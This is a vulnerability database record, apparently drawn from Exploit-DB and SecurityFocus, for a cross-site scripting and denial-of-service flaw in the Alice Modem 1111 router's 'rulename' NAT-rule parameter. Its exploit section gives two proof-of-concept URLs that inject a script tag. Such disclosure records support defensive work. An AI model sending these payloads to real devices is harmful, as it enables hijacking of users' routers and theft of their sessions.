ID

VAR-E-201107-0447


EDB ID

35939


TITLE

Alice Modem 1111 - 'rulename' Cross-Site Scripting / Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 35939

DESCRIPTION

Alice Modem 1111 - 'rulename' Cross-Site Scripting / Denial of Service.. dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 35939

AFFECTED PRODUCTS

vendor:alicemodel:modemscope:eqversion:1111

Trust: 1.3

sources: BID: 48642 // EXPLOIT-DB: 35939

EXPLOIT

source: https://www.securityfocus.com/bid/48642/info

The Alice Modem is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability because the device fails to properly handle user-supplied input.

An attacker may leverage these issues to cause a denial-of-service condition or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successfully exploiting the cross-site scripting issue may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

http://www.example.com/natAdd?apptype=userdefined&rulename=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=99

http://www.example.com/natAdd?apptype=userdefined&rulename=%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+y=&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=199&protocol1=proto_6&extportstart1=1&extportend1=1&intportstart1=1&intportend1=1&protocol2=proto_6&extportstart2=&extportend2=&intportstart2=&intportend2=&protocol3=proto_6&extportstart3=&extportend3=&intportstart3=&intportend3=

Trust: 1.0

sources: EXPLOIT-DB: 35939

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 35939

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 35939

TYPE

'rulename' Cross-Site Scripting / Denial of Service

Trust: 1.0

sources: EXPLOIT-DB: 35939

CREDITS

Moritz Naumann

Trust: 0.6

sources: EXPLOIT-DB: 35939

EXTERNAL IDS

db:BIDid:48642

Trust: 1.9

db:EXPLOIT-DBid:35939

Trust: 1.6

db:EDBNETid:57318

Trust: 0.6

sources: BID: 48642 // EXPLOIT-DB: 35939 // EDBNET: 57318

REFERENCES

url:https://www.securityfocus.com/bid/48642/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/35939/

Trust: 0.6

url:https://www.alice-dsl.de

Trust: 0.3

sources: BID: 48642 // EXPLOIT-DB: 35939 // EDBNET: 57318

SOURCES

db:BIDid:48642
db:EXPLOIT-DBid:35939
db:EDBNETid:57318

LAST UPDATE DATE

2022-07-27T09:47:46.706000+00:00


SOURCES UPDATE DATE

db:BIDid:48642date:2015-03-19T08:25:00

SOURCES RELEASE DATE

db:BIDid:48642date:2011-07-12T00:00:00
db:EXPLOIT-DBid:35939date:2011-07-12T00:00:00
db:EDBNETid:57318date:2011-07-12T00:00:00